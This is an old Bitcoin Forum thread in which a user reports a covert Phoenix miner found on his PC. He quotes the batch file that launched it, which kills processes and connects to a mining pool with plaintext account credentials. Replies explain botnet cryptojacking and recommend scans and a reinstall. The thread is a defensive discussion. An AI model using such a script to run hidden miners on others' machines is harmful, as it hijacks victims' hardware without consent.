Bitcoin Forum
March 28, 2017, 08:16:54 AM *
News: Latest stable version of Bitcoin Core: 0.14.0  [Torrent]. (New!)
 
   Home   Help Search Donate Login Register  
Pages: [1]
  Print  
Author Topic: Is this normal?  (Read 1178 times)
lostlegends
Newbie
*
Offline Offline

Activity: 1


View Profile
March 26, 2012, 11:11:14 PM
 #1

Hi,
 before tonight I didnt know what a bitcoin was or what a miner was, and too be honest im still not sure. Tonight when i opened Task manager too quite a buggy program I noticed catalyst.exe running, Thought this was strange because catalyst are ati drivers, I use Nvidia graphics. So I looked in more depth and found Phonix.exe running from a draw called folder1 on my hd. also in that draw was a .bat file with this text.
taskkill.exe /IM phoenix.exe /F
taskkill.exe /IM function3.exe /F
c:\folder1\3\phoenix.exe -u http://mlawson_miranda:miranda@eu.triplemining.com:8344 -k poclbm AGGRESSION=1 DEVICE=0
So I assume this phonix was installed by another program, as im the only user of this pc, and I will find what installed it. But as the subject heading says is this normal for people doing this to try a hyjack other peoples pcs, do I now need too keep a watch for these programs as well as viruses/malware/trojans etc?
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1490689014
Hero Member
*
Offline Offline

Posts: 1490689014

View Profile Personal Message (Offline)

Ignore
1490689014
Reply with quote  #2

1490689014
Report to moderator
1490689014
Hero Member
*
Offline Offline

Posts: 1490689014

View Profile Personal Message (Offline)

Ignore
1490689014
Reply with quote  #2

1490689014
Report to moderator
1490689014
Hero Member
*
Offline Offline

Posts: 1490689014

View Profile Personal Message (Offline)

Ignore
1490689014
Reply with quote  #2

1490689014
Report to moderator
DeathAndTaxes
Donator
Legendary
*
Offline Offline

Activity: 1218


Gerald Davis


View Profile
March 27, 2012, 12:14:24 AM
 #2

It is normal for botnet operators to exploit unprotected systems.   Doesn't really matter if it is bitcoin or sending mass penis enlargement spam.

If you didn't install that then you allowed your system to become compromised.

Nice find and obviously a script kiddie.  What kind of idiot hijacks a computer and then uses a public pool with their account in plaintext.

I would contact triplemining.com.  Hopefully they ban that user and seize the funds.
jake262144
Full Member
***
Offline Offline

Activity: 210


View Profile
March 27, 2012, 12:16:27 AM
 #3

Answering your question, yes, it is perfectly normal for criminals to break into and exploit computer systems.
It is an unfortunate yet undeniable fact that there is a very strong economic incentive to employ hijacked machines for mining a non-traceable virtual currency such as Bitcoin - it offers higher rewards than simply sending out spam messages or performing DDoS attacks.

Phoenix is a legitimate miner but it was apparently being used covertly, without your consent.

For any attacker to have such control over your machine, it must have been seriously compromised.
This is a very dangerous situation because if the attacker has such control over your system he might as well record all your keystrokes and steal the login credentials to your e-mail, internet banking, ebay, or pay-pal accounts.
I strongly suggest you perform a range of antivirus scans - you can use free online scanners(1) if you don't have one installed.

You need to get that system cleaned up ASAP. Better yet, back up valuable data, sanitize the hard drive and reinstall from scratch.
Always have up-to-date antivirus protection and install all the updates available for your OS.

Notes:
(1) there are links to three different scanners here.

EDIT:: Evening, DAT. I see you've been quite prolific - are you per chance aiming for some undisclosed "Godlike member" title? Cheesy
Mysil2
Newbie
*
Offline Offline

Activity: 15


View Profile
March 27, 2012, 12:33:07 AM
 #4

Also if you have got a keylogger installed like jake262144 warned about, be sure to change your passwords (not on the unclean computer, though Tongue)!

1BLUeBirdV2RBnyJBQZvNXsCMm3VVqoPTj
stevegee58
Hero Member
*****
Offline Offline

Activity: 783



View Profile
March 27, 2012, 12:37:44 AM
 #5

Guys, these things don't install themselves onto your computer.  You had to have clicked something to bring it in.

Most computer viruses (like biological one) are caught by engaging in unsafe practices and are completely avoidable.

You are in a maze of twisty little passages, all alike.
Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!